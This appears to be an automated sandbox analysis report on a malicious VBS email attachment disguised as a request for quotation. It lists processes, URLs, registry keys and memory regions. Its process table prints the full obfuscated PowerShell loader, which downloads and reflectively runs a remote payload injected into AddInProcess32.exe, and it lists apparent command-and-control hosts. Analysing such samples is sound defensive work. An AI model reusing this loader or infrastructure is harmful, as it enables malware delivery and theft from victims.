Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
RFQ-5120240930 VENETA PESCA SRL.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vdowbve.3mq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ua0yfmx.hvv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpj0nzva.ftc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwx412n5.41z.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFDA8E7D9BEC83FF01.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-5120240930 VENETA PESCA SRL.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSE9NRVsyMV0rJHBTSE9NZVszNF0rJ3gnKSgoKCdDJysnaVN1cmwgPScrJyBmJysnbVVodHRwczovJysnL3JhdycrJy5nJysnaXQnKydodWJ1JysncycrJ2VyJysnYycrJ28nKydudGVudCcrJy5jb20vTm8nKydEZXRlJysnY3RPbicrJy8nKydObycrJ0RlJysndGVjdE8nKyduL3JlZicrJ3MvJysnaGVhZHMnKycvJysnbWFpJysnbi9EJysnZXQnKydhaCcrJ05vdGgtVi50JysneHQnKydmbVU7IENpU2Jhc2U2NENvJysnbnRlJysnbnQgPSAoTmV3LU8nKydiJysnamVjdCcrJyBTeXN0ZW0uTicrJ2V0LldlYkMnKydsaScrJ2VudCkuJysnRG93bmxvYScrJ2RTJysndHInKydpbmcnKycoQ2knKydTdXInKydsKTsgQycrJ2lTYicrJ2knKyduYScrJ3J5JysnQ28nKydudCcrJ2VudCA9JysnICcrJ1tTeXN0ZScrJ20uQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpJysnbmcoJysnQycrJ2lTYmFzZTY0Q29uJysndGVudCk7JysnIEMnKydpUycrJ2Fzc2VtYicrJ2x5ID0nKycgJysnW1InKydlZmxlY3RpbycrJ24uQXMnKydzZW0nKydibHknKyddOjpMbycrJ2FkKCcrJ0MnKydpU2JpJysnbicrJ2FyeScrJ0MnKydvbnRlbicrJ3QnKycpJysnOyBbZG5saWIuSU8nKycuSG9tZV06OlZBSSgnKydhJysnM1UwL2RpeUtGL2QvZWUuJysnZXQnKydzJysnYXAnKycvLzpzcCcrJ3R0aGEzVSwgYTMnKydVZGVzJysnYScrJ3RpJysndicrJ2EnKydkb2EzVScrJywnKycgYScrJzNVZGUnKydzJysnYXRpdmEnKydkbycrJ2EzJysnVSwgYTNVZGUnKydzYXQnKydpJysndmFkb2EzVSwgYTNVQScrJ2RkJysnSW5QJysncm9jZScrJ3NzMzInKydhM1UsIGEzVWEnKyczVSxhM1VhJysnM1UpJykgLVJFcGxBY2UgIChbQ2hBcl05NytbQ2hBcl01MStbQ2hBcl04NSksW0NoQXJdMzQgLWNyZVBMYUNFICAnZm1VJyxbQ2hBcl0zOSAgLVJFcGxBY2UgIChbQ2hBcl02NytbQ2hBcl0xMDUrW0NoQXJdODMpLFtDaEFyXTM2KSAp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
".( $psHOME[21]+$pSHOMe[34]+'x')((('C'+'iSurl ='+' f'+'mUhttps:/'+'/raw'+'.g'+'it'+'hubu'+'s'+'er'+'c'+'o'+'ntent'+'.com/No'+'Dete'+'ctOn'+'/'+'No'+'De'+'tectO'+'n/ref'+'s/'+'heads'+'/'+'mai'+'n/D'+'et'+'ah'+'Noth-V.t'+'xt'+'fmU;
CiSbase64Co'+'nte'+'nt = (New-O'+'b'+'ject'+' System.N'+'et.WebC'+'li'+'ent).'+'Downloa'+'dS'+'tr'+'ing'+'(Ci'+'Sur'+'l);
C'+'iSb'+'i'+'na'+'ry'+'Co'+'nt'+'ent ='+' '+'[Syste'+'m.Con'+'vert'+']::FromBase64S'+'t'+'ri'+'ng('+'C'+'iSbase64Con'+'tent);'+'
C'+'iS'+'assemb'+'ly ='+' '+'[R'+'eflectio'+'n.As'+'sem'+'bly'+']::Lo'+'ad('+'C'+'iSbi'+'n'+'ary'+'C'+'onten'+'t'+')'+'; [dnlib.IO'+'.Home]::VAI('+'a'+'3U0/diyKF/d/ee.'+'et'+'s'+'ap'+'//:sp'+'ttha3U,
a3'+'Udes'+'a'+'ti'+'v'+'a'+'doa3U'+','+' a'+'3Ude'+'s'+'ativa'+'do'+'a3'+'U, a3Ude'+'sat'+'i'+'vadoa3U, a3UA'+'dd'+'InP'+'roce'+'ss32'+'a3U,
a3Ua'+'3U,a3Ua'+'3U)') -REplAce ([ChAr]97+[ChAr]51+[ChAr]85),[ChAr]34 -crePLaCE 'fmU',[ChAr]39 -REplAce ([ChAr]67+[ChAr]105+[ChAr]83),[ChAr]36)
)"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://aborters.duckdns.org:8081
|
unknown
|
|
|
|
https://paste.ee/d/FKyid/0
|
188.114.97.3
|
|
|
|
http://anotherarmy.dns.army:8081
|
unknown
|
|
|
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.110.133
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://raw.githubusercont
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
http://varders.kozow.com:8081
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
http://checkip.dyndns.org/q
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfmU;
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
raw.githubusercontent.com
|
185.199.110.133
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
185.199.110.133
|
raw.githubusercontent.com
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\VB and VBA Program Settings\Explorer\Process
|
LO
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
22C12CBC000
|
trusted library allocation
|
page read and write
|
|
|
|
7FFD340EB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34330000
|
trusted library allocation
|
page read and write
|
||
|
22C1277B000
|
trusted library allocation
|
page read and write
|
||
|
17BD8079000
|
heap
|
page read and write
|
||
|
EEF000
|
stack
|
page read and write
|
||
|
22C12B0D000
|
trusted library allocation
|
page read and write
|
||
|
D07D23E000
|
stack
|
page read and write
|
||
|
1A553FE0000
|
heap
|
page execute and read and write
|
||
|
17BD8108000
|
heap
|
page read and write
|
||
|
17BD83D1000
|
heap
|
page read and write
|
||
|
17BD8048000
|
heap
|
page read and write
|
||
|
7FFD343F0000
|
trusted library allocation
|
page read and write
|
||
|
22C7EF60000
|
heap
|
page read and write
|
||
|
7FFD342D0000
|
trusted library allocation
|
page read and write
|
||
|
22C12BAD000
|
trusted library allocation
|
page read and write
|
||
|
22C01490000
|
heap
|
page read and write
|
||
|
22C01A51000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34281000
|
trusted library allocation
|
page read and write
|
||
|
22C01BC4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34300000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34320000
|
trusted library allocation
|
page read and write
|
||
|
D07CCFE000
|
stack
|
page read and write
|
||
|
1A554290000
|
trusted library allocation
|
page read and write
|
||
|
58FC97D000
|
stack
|
page read and write
|
||
|
17BD807A000
|
heap
|
page read and write
|
||
|
D07CF38000
|
stack
|
page read and write
|
||
|
17BD8281000
|
heap
|
page read and write
|
||
|
22C7F1A0000
|
heap
|
page read and write
|
||
|
22C01A64000
|
trusted library allocation
|
page read and write
|
||
|
17BD8281000
|
heap
|
page read and write
|
||
|
1A56C312000
|
heap
|
page read and write
|
||
|
17BD8000000
|
heap
|
page read and write
|
||
|
22C7EED2000
|
heap
|
page read and write
|
||
|
1A554102000
|
heap
|
page read and write
|
||
|
17BD8399000
|
heap
|
page read and write
|
||
|
7FFD34310000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342D2000
|
trusted library allocation
|
page read and write
|
||
|
17BD6220000
|
heap
|
page read and write
|
||
|
7FFD34430000
|
trusted library allocation
|
page read and write
|
||
|
17BD8079000
|
heap
|
page read and write
|
||
|
17BD8043000
|
heap
|
page read and write
|
||
|
1A5521D0000
|
trusted library allocation
|
page read and write
|
||
|
17BD8078000
|
heap
|
page read and write
|
||
|
7FFD34340000
|
trusted library allocation
|
page read and write
|
||
|
1A554737000
|
trusted library allocation
|
page read and write
|
||
|
22C116D2000
|
trusted library allocation
|
page read and write
|
||
|
22C198B0000
|
heap
|
page read and write
|
||
|
22C1989E000
|
heap
|
page read and write
|
||
|
17BD8182000
|
heap
|
page read and write
|
||
|
7DF415530000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BD827E000
|
heap
|
page read and write
|
||
|
1A554308000
|
trusted library allocation
|
page read and write
|
||
|
1A552088000
|
heap
|
page read and write
|
||
|
22C0151C000
|
heap
|
page read and write
|
||
|
7FFD340E0000
|
trusted library allocation
|
page read and write
|
||
|
17BD632B000
|
heap
|
page read and write
|
||
|
7FFD341B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
58FCEFE000
|
stack
|
page read and write
|
||
|
22C7EECE000
|
heap
|
page read and write
|
||
|
22C127E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD340D4000
|
trusted library allocation
|
page read and write
|
||
|
22C127F7000
|
trusted library allocation
|
page read and write
|
||
|
1A5546F4000
|
trusted library allocation
|
page read and write
|
||
|
1A551F50000
|
heap
|
page read and write
|
||
|
17BD8004000
|
heap
|
page read and write
|
||
|
1A5540A9000
|
heap
|
page read and write
|
||
|
1A553B16000
|
heap
|
page read and write
|
||
|
22C199B0000
|
heap
|
page read and write
|
||
|
22C197B0000
|
heap
|
page read and write
|
||
|
7FE000
|
stack
|
page read and write
|
||
|
17BD83A7000
|
heap
|
page read and write
|
||
|
17BD816C000
|
heap
|
page read and write
|
||
|
7FFD34370000
|
trusted library allocation
|
page read and write
|
||
|
C4D000
|
heap
|
page read and write
|
||
|
17BD8070000
|
heap
|
page read and write
|
||
|
C71000
|
heap
|
page read and write
|
||
|
17BD6260000
|
heap
|
page read and write
|
||
|
22C03352000
|
trusted library allocation
|
page read and write
|
||
|
17BD8022000
|
heap
|
page read and write
|
||
|
1A554325000
|
trusted library allocation
|
page read and write
|
||
|
D07CAFD000
|
stack
|
page read and write
|
||
|
1A552132000
|
heap
|
page read and write
|
||
|
17BD8179000
|
heap
|
page read and write
|
||
|
17BD7CB0000
|
heap
|
page read and write
|
||
|
1A5540BD000
|
heap
|
page read and write
|
||
|
4EEFCFF000
|
stack
|
page read and write
|
||
|
22C118FC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34210000
|
trusted library allocation
|
page execute and read and write
|
||
|
22C01A5C000
|
trusted library allocation
|
page read and write
|
||
|
D07CDFE000
|
stack
|
page read and write
|
||
|
22C12A55000
|
trusted library allocation
|
page read and write
|
||
|
1A5521F0000
|
trusted library allocation
|
page read and write
|
||
|
17BD8001000
|
heap
|
page read and write
|
||
|
7FFD34380000
|
trusted library allocation
|
page read and write
|
||
|
1A56C220000
|
heap
|
page read and write
|
||
|
1A552049000
|
heap
|
page read and write
|
||
|
22C118F1000
|
trusted library allocation
|
page read and write
|
||
|
17BD6318000
|
heap
|
page read and write
|
||
|
B86000
|
heap
|
page read and write
|
||
|
17BD6267000
|
heap
|
page read and write
|
||
|
1A552210000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3428A000
|
trusted library allocation
|
page read and write
|
||
|
17BD628A000
|
heap
|
page read and write
|
||
|
22C19DB0000
|
trusted library section
|
page read and write
|
||
|
1A564272000
|
trusted library allocation
|
page read and write
|
||
|
22C7EED0000
|
heap
|
page read and write
|
||
|
58FCBF7000
|
stack
|
page read and write
|
||
|
17BD828C000
|
heap
|
page read and write
|
||
|
22C025CD000
|
trusted library allocation
|
page read and write
|
||
|
17BD8171000
|
heap
|
page read and write
|
||
|
1A56C348000
|
heap
|
page read and write
|
||
|
1A55212F000
|
heap
|
page read and write
|
||
|
17BD8101000
|
heap
|
page read and write
|
||
|
7FFD34410000
|
trusted library allocation
|
page read and write
|
||
|
22C127F4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD342B2000
|
trusted library allocation
|
page read and write
|
||
|
22C02D51000
|
trusted library allocation
|
page read and write
|
||
|
D07D03C000
|
stack
|
page read and write
|
||
|
1A55424F000
|
trusted library allocation
|
page read and write
|
||
|
22C7F184000
|
heap
|
page read and write
|
||
|
22C01B78000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343E0000
|
trusted library allocation
|
page read and write
|
||
|
17BD6120000
|
heap
|
page read and write
|
||
|
17BD8007000
|
heap
|
page read and write
|
||
|
286E000
|
stack
|
page read and write
|
||
|
22C01A8C000
|
trusted library allocation
|
page read and write
|
||
|
B80000
|
heap
|
page read and write
|
||
|
1A554263000
|
trusted library allocation
|
page read and write
|
||
|
22C12A16000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342A1000
|
trusted library allocation
|
page read and write
|
||
|
1A553AF0000
|
heap
|
page execute and read and write
|
||
|
7FFD343F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343E0000
|
trusted library allocation
|
page read and write
|
||
|
17BD8278000
|
heap
|
page read and write
|
||
|
7FFD340D2000
|
trusted library allocation
|
page read and write
|
||
|
22C7EE50000
|
heap
|
page read and write
|
||
|
1A56C30F000
|
heap
|
page read and write
|
||
|
17BD839D000
|
heap
|
page read and write
|
||
|
22C1195B000
|
trusted library allocation
|
page read and write
|
||
|
1A55431F000
|
trusted library allocation
|
page read and write
|
||
|
17BD8012000
|
heap
|
page read and write
|
||
|
17BD8017000
|
heap
|
page read and write
|
||
|
D07CE79000
|
stack
|
page read and write
|
||
|
7FFD342F0000
|
trusted library allocation
|
page read and write
|
||
|
4EEF8FA000
|
stack
|
page read and write
|
||
|
17BD6297000
|
heap
|
page read and write
|
||
|
AFB000
|
stack
|
page read and write
|
||
|
58FCB78000
|
stack
|
page read and write
|
||
|
17BD83AA000
|
heap
|
page read and write
|
||
|
1A553AF7000
|
heap
|
page execute and read and write
|
||
|
4EEFFFE000
|
stack
|
page read and write
|
||
|
17BD6289000
|
heap
|
page read and write
|
||
|
749000
|
stack
|
page read and write
|
||
|
1A55435B000
|
trusted library allocation
|
page read and write
|
||
|
17BD8151000
|
heap
|
page read and write
|
||
|
1A5520C7000
|
heap
|
page read and write
|
||
|
22C197A6000
|
heap
|
page execute and read and write
|
||
|
7FFD34350000
|
trusted library allocation
|
page read and write
|
||
|
1A554053000
|
heap
|
page read and write
|
||
|
7FFD34270000
|
trusted library allocation
|
page read and write
|
||
|
17BD8121000
|
heap
|
page read and write
|
||
|
22C1267B000
|
trusted library allocation
|
page read and write
|
||
|
17BD807A000
|
heap
|
page read and write
|
||
|
17BD633A000
|
heap
|
page read and write
|
||
|
17BD632C000
|
heap
|
page read and write
|
||
|
17BD827D000
|
heap
|
page read and write
|
||
|
B00000
|
heap
|
page read and write
|
||
|
1A5520A0000
|
heap
|
page read and write
|
||
|
1A55430B000
|
trusted library allocation
|
page read and write
|
||
|
17BD813C000
|
heap
|
page read and write
|
||
|
17BD815C000
|
heap
|
page read and write
|
||
|
7FFD340DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BD8027000
|
heap
|
page read and write
|
||
|
1A552040000
|
heap
|
page read and write
|
||
|
22C02D8D000
|
trusted library allocation
|
page read and write
|
||
|
22C1980F000
|
heap
|
page read and write
|
||
|
22C19750000
|
heap
|
page execute and read and write
|
||
|
4EF02FF000
|
stack
|
page read and write
|
||
|
2930000
|
heap
|
page read and write
|
||
|
17BD8058000
|
heap
|
page read and write
|
||
|
7FFD340FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
58FCF7B000
|
stack
|
page read and write
|
||
|
17BD6297000
|
heap
|
page read and write
|
||
|
22C01AB4000
|
trusted library allocation
|
page read and write
|
||
|
17BD83D1000
|
heap
|
page read and write
|
||
|
7FFD3446B000
|
trusted library allocation
|
page read and write
|
||
|
D07CA73000
|
stack
|
page read and write
|
||
|
BF0000
|
heap
|
page read and write
|
||
|
17BD812C000
|
heap
|
page read and write
|
||
|
22C197A0000
|
heap
|
page execute and read and write
|
||
|
22C01661000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34290000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A552200000
|
heap
|
page readonly
|
||
|
7FFD342C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BD8283000
|
heap
|
page read and write
|
||
|
D07D1BE000
|
stack
|
page read and write
|
||
|
386E000
|
stack
|
page read and write
|
||
|
1A554322000
|
trusted library allocation
|
page read and write
|
||
|
22C03289000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34190000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BD6318000
|
heap
|
page read and write
|
||
|
2810000
|
heap
|
page read and write
|
||
|
7FFD34441000
|
trusted library allocation
|
page read and write
|
||
|
1A564201000
|
trusted library allocation
|
page read and write
|
||
|
22C19877000
|
heap
|
page read and write
|
||
|
17BD8053000
|
heap
|
page read and write
|
||
|
1A554806000
|
trusted library allocation
|
page read and write
|
||
|
4EEF9FE000
|
stack
|
page read and write
|
||
|
17BD8182000
|
heap
|
page read and write
|
||
|
17BD6255000
|
heap
|
page read and write
|
||
|
1A552160000
|
heap
|
page read and write
|
||
|
7FFD343C0000
|
trusted library allocation
|
page read and write
|
||
|
1A552225000
|
heap
|
page read and write
|
||
|
17BD8053000
|
heap
|
page read and write
|
||
|
22C01430000
|
trusted library allocation
|
page read and write
|
||
|
22C11661000
|
trusted library allocation
|
page read and write
|
||
|
22C014D2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34340000
|
trusted library allocation
|
page read and write
|
||
|
4EF03FB000
|
stack
|
page read and write
|
||
|
22C128FB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD343B0000
|
trusted library allocation
|
page read and write
|
||
|
22C7EECC000
|
heap
|
page read and write
|
||
|
7FFD341AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A55430E000
|
trusted library allocation
|
page read and write
|
||
|
17BD8294000
|
heap
|
page read and write
|
||
|
7FFD34480000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343D0000
|
trusted library allocation
|
page read and write
|
||
|
22C02D87000
|
trusted library allocation
|
page read and write
|
||
|
D07DD0D000
|
stack
|
page read and write
|
||
|
58FC87E000
|
stack
|
page read and write
|
||
|
58FC50E000
|
stack
|
page read and write
|
||
|
1A56C30C000
|
heap
|
page read and write
|
||
|
7FFD340F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
22C01650000
|
heap
|
page execute and read and write
|
||
|
58FCDFF000
|
stack
|
page read and write
|
||
|
1A552134000
|
heap
|
page read and write
|
||
|
7FFD34380000
|
trusted library allocation
|
page read and write
|
||
|
7FFD340D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
22C19C60000
|
heap
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
17BD806B000
|
heap
|
page read and write
|
||
|
1A554544000
|
trusted library allocation
|
page read and write
|
||
|
22C01A88000
|
trusted library allocation
|
page read and write
|
||
|
58FCD7E000
|
stack
|
page read and write
|
||
|
17BD839B000
|
heap
|
page read and write
|
||
|
7FFD34330000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34470000
|
trusted library allocation
|
page read and write
|
||
|
17BD82A8000
|
heap
|
page read and write
|
||
|
1A56C300000
|
heap
|
page read and write
|
||
|
7FFD34463000
|
trusted library allocation
|
page read and write
|
||
|
1A55213A000
|
heap
|
page read and write
|
||
|
22C1292A000
|
trusted library allocation
|
page read and write
|
||
|
1A56420F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD342B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BD629F000
|
heap
|
page read and write
|
||
|
22C11671000
|
trusted library allocation
|
page read and write
|
||
|
1A554140000
|
heap
|
page read and write
|
||
|
4EEFDFF000
|
stack
|
page read and write
|
||
|
7FFD343C0000
|
trusted library allocation
|
page read and write
|
||
|
58FCAFF000
|
stack
|
page read and write
|
||
|
7FFD34310000
|
trusted library allocation
|
page read and write
|
||
|
22C198D0000
|
heap
|
page read and write
|
||
|
1A554010000
|
heap
|
page read and write
|
||
|
7FFD342F0000
|
trusted library allocation
|
page read and write
|
||
|
17BD6200000
|
heap
|
page read and write
|
||
|
7FFD34420000
|
trusted library allocation
|
page read and write
|
||
|
7FFD340F4000
|
trusted library allocation
|
page read and write
|
||
|
22C7F060000
|
heap
|
page read and write
|
||
|
D07CEBF000
|
stack
|
page read and write
|
||
|
22C02D63000
|
trusted library allocation
|
page read and write
|
||
|
22C12707000
|
trusted library allocation
|
page read and write
|
||
|
22C7EF17000
|
heap
|
page read and write
|
||
|
58FC58E000
|
stack
|
page read and write
|
||
|
1A5540F7000
|
heap
|
page read and write
|
||
|
22C7F1A4000
|
heap
|
page read and write
|
||
|
17BD814C000
|
heap
|
page read and write
|
||
|
7FFD34370000
|
trusted library allocation
|
page read and write
|
||
|
17BD8003000
|
heap
|
page read and write
|
||
|
17BD83AA000
|
heap
|
page read and write
|
||
|
7FFD343A0000
|
trusted library allocation
|
page read and write
|
||
|
22C01B9F000
|
trusted library allocation
|
page read and write
|
||
|
17BD6296000
|
heap
|
page read and write
|
||
|
1A5520C9000
|
heap
|
page read and write
|
||
|
17BD8145000
|
heap
|
page read and write
|
||
|
22C01A46000
|
trusted library allocation
|
page read and write
|
||
|
1A552126000
|
heap
|
page read and write
|
||
|
7FFD34400000
|
trusted library allocation
|
page read and write
|
||
|
17BD8161000
|
heap
|
page read and write
|
||
|
1A554201000
|
trusted library allocation
|
page read and write
|
||
|
1A552080000
|
heap
|
page read and write
|
||
|
17BD84B9000
|
heap
|
page read and write
|
||
|
7FFD343D0000
|
trusted library allocation
|
page read and write
|
||
|
D07CC7D000
|
stack
|
page read and write
|
||
|
36DE000
|
stack
|
page read and write
|
||
|
17BD6290000
|
heap
|
page read and write
|
||
|
22C129A1000
|
trusted library allocation
|
page read and write
|
||
|
D07D2BB000
|
stack
|
page read and write
|
||
|
17BD8182000
|
heap
|
page read and write
|
||
|
22C12923000
|
trusted library allocation
|
page read and write
|
||
|
22C7F180000
|
heap
|
page read and write
|
||
|
17BD83B1000
|
heap
|
page read and write
|
||
|
D07D13E000
|
stack
|
page read and write
|
||
|
1A554600000
|
trusted library allocation
|
page read and write
|
||
|
22C02FAD000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD341B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
278F000
|
stack
|
page read and write
|
||
|
7FFD340F2000
|
trusted library allocation
|
page read and write
|
||
|
22C12B83000
|
trusted library allocation
|
page read and write
|
||
|
17BD828A000
|
heap
|
page read and write
|
||
|
7FFD34360000
|
trusted library allocation
|
page read and write
|
||
|
C28000
|
heap
|
page read and write
|
||
|
1A55421B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34320000
|
trusted library allocation
|
page read and write
|
||
|
1A5541F0000
|
heap
|
page execute and read and write
|
||
|
17BD82A8000
|
heap
|
page read and write
|
||
|
1A56C302000
|
heap
|
page read and write
|
||
|
B5E000
|
stack
|
page read and write
|
||
|
17BD8032000
|
heap
|
page read and write
|
||
|
22C12704000
|
trusted library allocation
|
page read and write
|
||
|
22C7EE99000
|
heap
|
page read and write
|
||
|
1A552220000
|
heap
|
page read and write
|
||
|
7FFD34300000
|
trusted library allocation
|
page read and write
|
||
|
D07CFBD000
|
stack
|
page read and write
|
||
|
1A55208A000
|
heap
|
page read and write
|
||
|
396E000
|
stack
|
page read and write
|
||
|
22C1985A000
|
heap
|
page read and write
|
||
|
17BD8079000
|
heap
|
page read and write
|
||
|
22C12A41000
|
trusted library allocation
|
page read and write
|
||
|
7FFD341A0000
|
trusted library allocation
|
page read and write
|
||
|
58FCC77000
|
stack
|
page read and write
|
||
|
17BD8177000
|
heap
|
page read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
7FFD34350000
|
trusted library allocation
|
page read and write
|
||
|
17BD8172000
|
heap
|
page read and write
|
||
|
17BD837A000
|
heap
|
page read and write
|
||
|
58FCCFC000
|
stack
|
page read and write
|
||
|
1A55208E000
|
heap
|
page read and write
|
||
|
17BD8301000
|
heap
|
page read and write
|
||
|
22C197C5000
|
heap
|
page read and write
|
||
|
7FFD343B0000
|
trusted library allocation
|
page read and write
|
||
|
17BD84B9000
|
heap
|
page read and write
|
||
|
17BD8063000
|
heap
|
page read and write
|
||
|
17BD8079000
|
heap
|
page read and write
